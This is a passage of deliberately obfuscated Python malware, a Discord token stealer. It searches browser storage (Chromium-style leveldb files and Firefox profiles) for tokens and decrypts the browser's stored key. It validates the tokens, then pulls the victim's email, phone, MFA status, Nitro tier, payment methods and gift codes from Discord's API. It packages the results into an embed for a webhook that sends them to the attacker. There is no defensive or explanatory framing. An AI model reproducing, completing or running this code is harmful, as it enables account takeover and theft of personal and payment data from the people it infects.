                                        NORWIIGUOQGQDRWFTSWGYMVPPOEOAAMGVAEWOALMBYSASVSNCISVAXQLBTCTXZBVODOPRMPQDVFHJOMVMVRISZTOIGOXJJYMNVU[RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB] = (ZFAICVZGCJXPJQIPVMUYMGFVHPAXPCTMNLFSZTAWSXJIQAPGLQRQYOFDVQLBPFHWFFIGEREHRBGARRJTTXVGANPXSOJK, f"{ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG}\\{v4r_file_name}")
            else:
                for v4r_file_name in os.listdir(ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB in re.findall(WZNQHDXUYQLFJSWXSZTQPOAITRWLUMIQCSGNJFTVVFGGHYWZDOPVTMPSEVKGZMTIUPCJHYFQUPXNGECSVYOFLJFAZIEXWK, v4r_line.strip()):
                                if ULWLAVXKRFARQOUDMHGTKLDMZICCCYLEJYXLGPSFXCTVMEVLYFLCW(RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB, XSIATMKDBUBJAZVWOIROLMPJXUBYOBBUCPYOKHXDDKFFMEVJFEKZYOGL):
                                    RADHZWUCJHCSZHMHEHCYAQMCLOGHDGPURNSCKYOSDFTCFZILQKBRZTPWYTWLSDGDDMEOGDPZXZIGYUFWTPUDXUIDXBHUNGYYT = requests.get(XSIATMKDBUBJAZVWOIROLMPJXUBYOBBUCPYOKHXDDKFFMEVJFEKZYOGL, headers={'Authorization': RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB}).json()['id']
                                    if RADHZWUCJHCSZHMHEHCYAQMCLOGHDGPURNSCKYOSDFTCFZILQKBRZTPWYTWLSDGDDMEOGDPZXZIGYUFWTPUDXUIDXBHUNGYYT not in QOVWOXIVSVKZRJBFKUHLPONCRUGQTDVQGPXKLVJFOGJEQOFKUVNIXVOODJSQJKWSOSMUITTWVPR:
                                        KLMUSQPWUENYLCPMIWMVCHRUGFSFNSBRKMBPKSWHANECDTSNKTFPHNUBLSSZULZOEJBHYUOREXEOHHNHQBDLXSDG.append(RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB)
                                        QOVWOXIVSVKZRJBFKUHLPONCRUGQTDVQGPXKLVJFOGJEQOFKUVNIXVOODJSQJKWSOSMUITTWVPR.append(RADHZWUCJHCSZHMHEHCYAQMCLOGHDGPURNSCKYOSDFTCFZILQKBRZTPWYTWLSDGDDMEOGDPZXZIGYUFWTPUDXUIDXBHUNGYYT)
                                        NORWIIGUOQGQDRWFTSWGYMVPPOEOAAMGVAEWOALMBYSASVSNCISVAXQLBTCTXZBVODOPRMPQDVFHJOMVMVRISZTOIGOXJJYMNVU[RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB] = (ZFAICVZGCJXPJQIPVMUYMGFVHPAXPCTMNLFSZTAWSXJIQAPGLQRQYOFDVQLBPFHWFFIGEREHRBGARRJTTXVGANPXSOJK, f"{ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG}\\{v4r_file_name}")

        if os.path.exists(SWNOAQKKAIBEHWNHWDKFEJODUXRODUAHRIFYUMMRZXXDMRIVGKCUYCHCSZNFQSKWMFZMNWKN + "\\Mozilla\\Firefox\\Profiles"):
            for ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG, _, v4r_files in os.walk(SWNOAQKKAIBEHWNHWDKFEJODUXRODUAHRIFYUMMRZXXDMRIVGKCUYCHCSZNFQSKWMFZMNWKN + "\\Mozilla\\Firefox\\Profiles"):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB in re.findall(WZNQHDXUYQLFJSWXSZTQPOAITRWLUMIQCSGNJFTVVFGGHYWZDOPVTMPSEVKGZMTIUPCJHYFQUPXNGECSVYOFLJFAZIEXWK, v4r_line.strip()):
                                    if ULWLAVXKRFARQOUDMHGTKLDMZICCCYLEJYXLGPSFXCTVMEVLYFLCW(RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB, XSIATMKDBUBJAZVWOIROLMPJXUBYOBBUCPYOKHXDDKFFMEVJFEKZYOGL):
                                        RADHZWUCJHCSZHMHEHCYAQMCLOGHDGPURNSCKYOSDFTCFZILQKBRZTPWYTWLSDGDDMEOGDPZXZIGYUFWTPUDXUIDXBHUNGYYT = requests.get(XSIATMKDBUBJAZVWOIROLMPJXUBYOBBUCPYOKHXDDKFFMEVJFEKZYOGL, headers={'Authorization': RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB}).json()['id']
                                        if RADHZWUCJHCSZHMHEHCYAQMCLOGHDGPURNSCKYOSDFTCFZILQKBRZTPWYTWLSDGDDMEOGDPZXZIGYUFWTPUDXUIDXBHUNGYYT not in QOVWOXIVSVKZRJBFKUHLPONCRUGQTDVQGPXKLVJFOGJEQOFKUVNIXVOODJSQJKWSOSMUITTWVPR:
                                            KLMUSQPWUENYLCPMIWMVCHRUGFSFNSBRKMBPKSWHANECDTSNKTFPHNUBLSSZULZOEJBHYUOREXEOHHNHQBDLXSDG.append(RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB)
                                            QOVWOXIVSVKZRJBFKUHLPONCRUGQTDVQGPXKLVJFOGJEQOFKUVNIXVOODJSQJKWSOSMUITTWVPR.append(RADHZWUCJHCSZHMHEHCYAQMCLOGHDGPURNSCKYOSDFTCFZILQKBRZTPWYTWLSDGDDMEOGDPZXZIGYUFWTPUDXUIDXBHUNGYYT)
                                            NORWIIGUOQGQDRWFTSWGYMVPPOEOAAMGVAEWOALMBYSASVSNCISVAXQLBTCTXZBVODOPRMPQDVFHJOMVMVRISZTOIGOXJJYMNVU[RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB] = ('Firefox', f"{ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG}\\{v4r__file}")
        return KLMUSQPWUENYLCPMIWMVCHRUGFSFNSBRKMBPKSWHANECDTSNKTFPHNUBLSSZULZOEJBHYUOREXEOHHNHQBDLXSDG, NORWIIGUOQGQDRWFTSWGYMVPPOEOAAMGVAEWOALMBYSASVSNCISVAXQLBTCTXZBVODOPRMPQDVFHJOMVMVRISZTOIGOXJJYMNVU

    def ULWLAVXKRFARQOUDMHGTKLDMZICCCYLEJYXLGPSFXCTVMEVLYFLCW(RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB, XSIATMKDBUBJAZVWOIROLMPJXUBYOBBUCPYOKHXDDKFFMEVJFEKZYOGL):
        return requests.get(XSIATMKDBUBJAZVWOIROLMPJXUBYOBBUCPYOKHXDDKFFMEVJFEKZYOGL, headers={'Authorization': RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB}).status_code == 200

    def XWARXVUXNUNJINBVTERSKQOLBYYKFUBFGZNUDRKGKFMPAXBRGLNJTJHVal(YOKOQIDMDZQSRXFYZYCVJRYPZPXYWQIMYEEQPYDAPMULOZIESYNFEPQHIEKZTQEJWKLDBLXMKRGCKPOHOMNCGPMTJJJPRXV, FCZKGJOMJXGWAIFWCUNZWOHLDQNUOSBCPQTRFUPWAHNBPLTYARGMHWHJBYXYAIIKBW):
        GDMGWPTPUFAMEUKWXCWZBNQFWIMKUBKDDFGUNZPIEDAJHWRXRBMHXFBBGPJVTRCPQTPOVSSCGPBSLMOWHZPOEEOPB = YOKOQIDMDZQSRXFYZYCVJRYPZPXYWQIMYEEQPYDAPMULOZIESYNFEPQHIEKZTQEJWKLDBLXMKRGCKPOHOMNCGPMTJJJPRXV[3:15]
        EEZRVFKQVGEJLQFNAUDYMLBAZIGWZHPRKVUATXTEMHTMFIEBIYZBDNHKNKGHDHSRWOAAWJOQQVEOIXBWQSKSTETAQ = YOKOQIDMDZQSRXFYZYCVJRYPZPXYWQIMYEEQPYDAPMULOZIESYNFEPQHIEKZTQEJWKLDBLXMKRGCKPOHOMNCGPMTJJJPRXV[15:]
        VFBXXCVDNUGYINHMVEXEHZALEYPIAKFGHQOQTYKHBLMSEYURYZVDHFJ = AES.new(FCZKGJOMJXGWAIFWCUNZWOHLDQNUOSBCPQTRFUPWAHNBPLTYARGMHWHJBYXYAIIKBW, AES.MODE_GCM, GDMGWPTPUFAMEUKWXCWZBNQFWIMKUBKDDFGUNZPIEDAJHWRXRBMHXFBBGPJVTRCPQTPOVSSCGPBSLMOWHZPOEEOPB)
        return VFBXXCVDNUGYINHMVEXEHZALEYPIAKFGHQOQTYKHBLMSEYURYZVDHFJ.decrypt(EEZRVFKQVGEJLQFNAUDYMLBAZIGWZHPRKVUATXTEMHTMFIEBIYZBDNHKNKGHDHSRWOAAWJOQQVEOIXBWQSKSTETAQ)[:-16].decode()

    def WZJYEXNDYAWUXJEWZZVZIBYLCAZVSDCVRIVHCHXYFOAEMZQRFMAOVUSQPINNUJGOXJQJF(ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG):
        if not os.path.exists(ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG):
            return None
        with open(ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG, "r", encoding="utf-8") as v4r_f:
            AQWJPZVAYIDDLTHITGWCIASDQQQNKQTVAQDJFPRUSJRDXMNHZUMFEKCLKYPKVKGAIBYNOGJRQYSVDKHQWZI = json.load(v4r_f)
        FCZKGJOMJXGWAIFWCUNZWOHLDQNUOSBCPQTRFUPWAHNBPLTYARGMHWHJBYXYAIIKBW = base64.b64decode(AQWJPZVAYIDDLTHITGWCIASDQQQNKQTVAQDJFPRUSJRDXMNHZUMFEKCLKYPKVKGAIBYNOGJRQYSVDKHQWZI["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(FCZKGJOMJXGWAIFWCUNZWOHLDQNUOSBCPQTRFUPWAHNBPLTYARGMHWHJBYXYAIIKBW, None, None, None, 0)[1]

    KLMUSQPWUENYLCPMIWMVCHRUGFSFNSBRKMBPKSWHANECDTSNKTFPHNUBLSSZULZOEJBHYUOREXEOHHNHQBDLXSDG, NORWIIGUOQGQDRWFTSWGYMVPPOEOAAMGVAEWOALMBYSASVSNCISVAXQLBTCTXZBVODOPRMPQDVFHJOMVMVRISZTOIGOXJJYMNVU = VTNRXIKBHHQYFCRSTGDITSGVDVZSRITRXCENUGRERZSPHSCBGKKZGVTLTJCFAXQESGQP()
    TGDJIAPQDMGKOATFEYXKIIYCGSBAXXRZCFEMGUBAPCXFBWIDRUMURIQGSSXHQETEQH = SyncWebhook.from_url(HPZPFTJUMICLTXQGZGKHNCSONJDNKTSMVJQWNTYXLKMIJRMTXIVKTKNRYALPQCLWDLPAJQQJJFXCUIOVATCBVHR)

    if not KLMUSQPWUENYLCPMIWMVCHRUGFSFNSBRKMBPKSWHANECDTSNKTFPHNUBLSSZULZOEJBHYUOREXEOHHNHQBDLXSDG:
        HWYMTTLYXHZNJDFTQBEWCXJUPHJQSJVEBZQXYKAMEMIKQDFISZGNNYAIUPOFOR(
            HPZPFTJUMICLTXQGZGKHNCSONJDNKTSMVJQWNTYXLKMIJRMTXIVKTKNRYALPQCLWDLPAJQQJJFXCUIOVATCBVHR, 
            title=f'Discord Token {JHJKWSQPAMHXSASDEIGCRVCZPRDKCZAZXZBUAWHWDFCKBSLPXSLBNKUDYFLSYLBGYYLYEAUKMKSPKGYBJCAZD}:', 
            description=f"No discord tokens found."
        )
        return
    
    for RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB_d15c0rd in KLMUSQPWUENYLCPMIWMVCHRUGFSFNSBRKMBPKSWHANECDTSNKTFPHNUBLSSZULZOEJBHYUOREXEOHHNHQBDLXSDG:
        JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB_d15c0rd}).json()

        FEVNZXQIKTUPASGPKYVHQKLMAAOMJWJOFOXYNGAHMKAIIHSTBGOQACANHNI = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('username', "None") + '#' + JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('discriminator', "None")
        BRFPPEEFVLYFQYEXQQUNEWFODWLFSOBGRHPCZAOYHMKDFOBBQBJFQIUCTVSUWIOJDDMTTRQOUJFEWJWZSDXNHDADZAIKTKWMMUVC = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('global_name', "None")
        SWIZIRRMTKHBEFPCOHGTYHDJHOGLDZCZXRKMAYUUMYZDWZENRCZMGKKQZAQFLPZIRF = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('id', "None")
        ZNEDVPOUZEPBDVRJRKXMNEDNMSIOMTCUSYZBGHKUTNDIVKGPCGOLTNUAOMCCPQEZJFBGHQWLQESFP = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('email', "None")
        FAZNTRBRMQYODDKDQQHBBKBUTWRXLEVTPFSTTOEZVMMMUCIJRL = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('verified', "None")
        THZIUSLUQGJQFYPIEGFOQARUIHVLWLMMHHFACMOTFRXBXBBWOZWH = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('phone', "None")
        TMJLTCYGIQQEVCDWGFUATKXTHZVADJQGYQEDGGQIQWYKLQZOLXTGUTFHRVJSCBBVJJGUOJJUSJEMQYOPWRDYRDBSAIENHNTYCVV = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('locale', "None")
        HBKSGLGXHEYOBUJVMCSROYNZYSNYYWWUNAPQXZCYUFCCADIAIRHIHNVHVFMKARTF = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('mfa_enabled', "None")

        try:
            if JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('premium_type', 'None') == 0:
                BMKTXWNEPPBHSGBODSHALIYODCPHCDBIOZJKNNGNQJXHLTMJEVINYPNFYLEBBPCS = 'False'
            elif JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('premium_type', 'None') == 1:
                BMKTXWNEPPBHSGBODSHALIYODCPHCDBIOZJKNNGNQJXHLTMJEVINYPNFYLEBBPCS = 'Nitro Classic'
            elif JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('premium_type', 'None') == 2:
                BMKTXWNEPPBHSGBODSHALIYODCPHCDBIOZJKNNGNQJXHLTMJEVINYPNFYLEBBPCS = 'Nitro Boosts'
            elif JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('premium_type', 'None') == 3:
                BMKTXWNEPPBHSGBODSHALIYODCPHCDBIOZJKNNGNQJXHLTMJEVINYPNFYLEBBPCS = 'Nitro Basic'
            else:
                BMKTXWNEPPBHSGBODSHALIYODCPHCDBIOZJKNNGNQJXHLTMJEVINYPNFYLEBBPCS = 'False'
        except:
            BMKTXWNEPPBHSGBODSHALIYODCPHCDBIOZJKNNGNQJXHLTMJEVINYPNFYLEBBPCS = "None"

        try: 
            OYPOKTXARBVGBCKDSUBZVGDWNYAAIJWSGRSLIGECZEHKLLMHFTLSDLSDZUVRDZTGEIVEBZMAVPFHUHTCCDHGEBDM = f"https://cdn.discordapp.com/avatars/{SWIZIRRMTKHBEFPCOHGTYHDJHOGLDZCZXRKMAYUUMYZDWZENRCZMGKKQZAQFLPZIRF}/{JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{SWIZIRRMTKHBEFPCOHGTYHDJHOGLDZCZXRKMAYUUMYZDWZENRCZMGKKQZAQFLPZIRF}/{JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{SWIZIRRMTKHBEFPCOHGTYHDJHOGLDZCZXRKMAYUUMYZDWZENRCZMGKKQZAQFLPZIRF}/{JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL['avatar']}.png"
        except: 
            OYPOKTXARBVGBCKDSUBZVGDWNYAAIJWSGRSLIGECZEHKLLMHFTLSDLSDZUVRDZTGEIVEBZMAVPFHUHTCCDHGEBDM = GTGZMHOJTHCXDPEESGWHSLTQWIAWGLFFUAHQECSISRNEIMGLSZFMJUZQCPLUZUFSXUXIRP

        try:
            RCWSENHZAAKMGDTSRYZRUQKDUDMCTYMGGBUJLCMEXBRHGHTHBVXAPTRGSERZDTHPCD = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB_d15c0rd}).json()
            if RCWSENHZAAKMGDTSRYZRUQKDUDMCTYMGGBUJLCMEXBRHGHTHBVXAPTRGSERZDTHPCD:
                PWKVWCQGRAWAMSUHIVFUWVUDTHOOGNGRPXMHKWBSGFOREWAFVFLVBUTDAYBLECMWCQYAOCAW = []

                for v4r_method in RCWSENHZAAKMGDTSRYZRUQKDUDMCTYMGGBUJLCMEXBRHGHTHBVXAPTRGSERZDTHPCD:
                    if v4r_method['type'] == 1:
                        PWKVWCQGRAWAMSUHIVFUWVUDTHOOGNGRPXMHKWBSGFOREWAFVFLVBUTDAYBLECMWCQYAOCAW.append('CB')
                    elif v4r_method['type'] == 2:
                        PWKVWCQGRAWAMSUHIVFUWVUDTHOOGNGRPXMHKWBSGFOREWAFVFLVBUTDAYBLECMWCQYAOCAW.append("Paypal")
                    else:
                        PWKVWCQGRAWAMSUHIVFUWVUDTHOOGNGRPXMHKWBSGFOREWAFVFLVBUTDAYBLECMWCQYAOCAW.append('Other')
                PWKVWCQGRAWAMSUHIVFUWVUDTHOOGNGRPXMHKWBSGFOREWAFVFLVBUTDAYBLECMWCQYAOCAW = ' / '.join(PWKVWCQGRAWAMSUHIVFUWVUDTHOOGNGRPXMHKWBSGFOREWAFVFLVBUTDAYBLECMWCQYAOCAW)
            else:
                PWKVWCQGRAWAMSUHIVFUWVUDTHOOGNGRPXMHKWBSGFOREWAFVFLVBUTDAYBLECMWCQYAOCAW = "None"
        except:
            PWKVWCQGRAWAMSUHIVFUWVUDTHOOGNGRPXMHKWBSGFOREWAFVFLVBUTDAYBLECMWCQYAOCAW = "None"

        try:
            WZEUTWZGWTXSRMJCQONZXDWIEVLGBHYFWPJPDLFKFUROTKBBBYAW = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB_d15c0rd}).json()
            if WZEUTWZGWTXSRMJCQONZXDWIEVLGBHYFWPJPDLFKFUROTKBBBYAW:
                QVVNZRNBDQJPLBIITFUYEXOWLEMOXPPGYCOCOANIVAFLRANKYHHVJOXYGANIXNPZNDCXNRUG = []
                for ZUFIUDJIKDFDNMZZAWEIYMNDRHTXNPJLMVRLTKSQPNKRBSRBEOWVVLMFVWUMEVNXDSFBEBQDGRTXXQXPMZPVLG in WZEUTWZGWTXSRMJCQONZXDWIEVLGBHYFWPJPDLFKFUROTKBBBYAW:
                    ZFAICVZGCJXPJQIPVMUYMGFVHPAXPCTMNLFSZTAWSXJIQAPGLQRQYOFDVQLBPFHWFFIGEREHRBGARRJTTXVGANPXSOJK = ZUFIUDJIKDFDNMZZAWEIYMNDRHTXNPJLMVRLTKSQPNKRBSRBEOWVVLMFVWUMEVNXDSFBEBQDGRTXXQXPMZPVLG['promotion']['outbound_title']
                    ZUFIUDJIKDFDNMZZAWEIYMNDRHTXNPJLMVRLTKSQPNKRBSRBEOWVVLMFVWUMEVNXDSFBEBQDGRTXXQXPMZPVLG = ZUFIUDJIKDFDNMZZAWEIYMNDRHTXNPJLMVRLTKSQPNKRBSRBEOWVVLMFVWUMEVNXDSFBEBQDGRTXXQXPMZPVLG['code']
                    UYBJRBFBUBKHSNOKEEQVMACJSZFZDDTVOKJZPPTPTSJRIENMZWBGBFWHUHZBVXTRWASZZLIGMKUUBNZOTPNR = f"Gift: {ZFAICVZGCJXPJQIPVMUYMGFVHPAXPCTMNLFSZTAWSXJIQAPGLQRQYOFDVQLBPFHWFFIGEREHRBGARRJTTXVGANPXSOJK}\nCode: {ZUFIUDJIKDFDNMZZAWEIYMNDRHTXNPJLMVRLTKSQPNKRBSRBEOWVVLMFVWUMEVNXDSFBEBQDGRTXXQXPMZPVLG}"
                    if len('\n\n'.join(ZUFIUDJIKDFDNMZZAWEIYMNDRHTXNPJLMVRLTKSQPNKRBSRBEOWVVLMFVWUMEVNXDSFBEBQDGRTXXQXPMZPVLG)) + len(UYBJRBFBUBKHSNOKEEQVMACJSZFZDDTVOKJZPPTPTSJRIENMZWBGBFWHUHZBVXTRWASZZLIGMKUUBNZOTPNR) >= 1024:
                        break
                    QVVNZRNBDQJPLBIITFUYEXOWLEMOXPPGYCOCOANIVAFLRANKYHHVJOXYGANIXNPZNDCXNRUG.append(UYBJRBFBUBKHSNOKEEQVMACJSZFZDDTVOKJZPPTPTSJRIENMZWBGBFWHUHZBVXTRWASZZLIGMKUUBNZOTPNR)
                if len(QVVNZRNBDQJPLBIITFUYEXOWLEMOXPPGYCOCOANIVAFLRANKYHHVJOXYGANIXNPZNDCXNRUG) > 0:
                    ZUFIUDJIKDFDNMZZAWEIYMNDRHTXNPJLMVRLTKSQPNKRBSRBEOWVVLMFVWUMEVNXDSFBEBQDGRTXXQXPMZPVLG = '\n\n'.join(QVVNZRNBDQJPLBIITFUYEXOWLEMOXPPGYCOCOANIVAFLRANKYHHVJOXYGANIXNPZNDCXNRUG)
                else:
                    ZUFIUDJIKDFDNMZZAWEIYMNDRHTXNPJLMVRLTKSQPNKRBSRBEOWVVLMFVWUMEVNXDSFBEBQDGRTXXQXPMZPVLG = "None"
            else:
                ZUFIUDJIKDFDNMZZAWEIYMNDRHTXNPJLMVRLTKSQPNKRBSRBEOWVVLMFVWUMEVNXDSFBEBQDGRTXXQXPMZPVLG = "None"
        except:
            ZUFIUDJIKDFDNMZZAWEIYMNDRHTXNPJLMVRLTKSQPNKRBSRBEOWVVLMFVWUMEVNXDSFBEBQDGRTXXQXPMZPVLG = "None"
    
        v4r_software_name, ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG = NORWIIGUOQGQDRWFTSWGYMVPPOEOAAMGVAEWOALMBYSASVSNCISVAXQLBTCTXZBVODOPRMPQDVFHJOMVMVRISZTOIGOXJJYMNVU.get(RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB_d15c0rd, ("Unknown Software", "Unknown location"))

        embed = Embed(title=f'Discord Token {JHJKWSQPAMHXSASDEIGCRVCZPRDKCZAZXZBUAWHWDFCKBSLPXSLBNKUDYFLSYLBGYYLYEAUKMKSPKGYBJCAZD}:', color=XPAJVRCFMRTODIHPRPMQELYNIGHPNKWHQUGUJYPRLFOTYDLYDJUQCIBWMBEFJMHUETNYYAYFSBPICTBRGXRJRZHBW)      
        embed.add_field(name=":file_folder: Path:", value=f"```{ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG}```", inline=True)
        embed.add_field(name=":globe_with_meridians: Token:", value=f"```{RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB_d15c0rd}```", inline=True)
        embed.add_field(name=":package: Software:", value=f"```{v4r_software_name}```", inline=True)
        embed.add_field(name=":bust_in_silhouette: Username:", value=f"```{FEVNZXQIKTUPASGPKYVHQKLMAAOMJWJOFOXYNGAHMKAIIHSTBGOQACANHNI}```", inline=True)
        embed.add_field(name=":bust_in_silhouette: Display Name:", value=f"```{BRFPPEEFVLYFQYEXQQUNEWFODWLFSOBGRHPCZAOYHMKDFOBBQBJFQIUCTVSUWIOJDDMTTRQOUJFEWJWZSDXNHDADZAIKTKWMMUVC}```", inline=True)
        embed.add_field(name=":robot: Id:", value=f"```{SWIZIRRMTKHBEFPCOHGTYHDJHOGLDZCZXRKMAYUUMYZDWZENRCZMGKKQZAQFLPZIRF}```", inline=True)
        embed.add_field(name=":e_mail: Email:", value=f"```{ZNEDVPOUZEPBDVRJRKXMNEDNMSIOMTCUSYZBGHKUTNDIVKGPCGOLTNUAOMCCPQEZJFBGHQWLQESFP}```", inline=True)
        embed.add_field(name=":white_check_mark: Email Verified:", value=f"```{FAZNTRBRMQYODDKDQQHBBKBUTWRXLEVTPFSTTOEZVMMMUCIJRL}```", inline=True)
        embed.add_field(name=":telephone_receiver: Phone:", value=f"```{THZIUSLUQGJQFYPIEGFOQARUIHVLWLMMHHFACMOTFRXBXBBWOZWH}```", inline=True)   
        embed.add_field(name=":rocket: Nitro:", value=f"```{BMKTXWNEPPBHSGBODSHALIYODCPHCDBIOZJKNNGNQJXHLTMJEVINYPNFYLEBBPCS}```", inline=True)
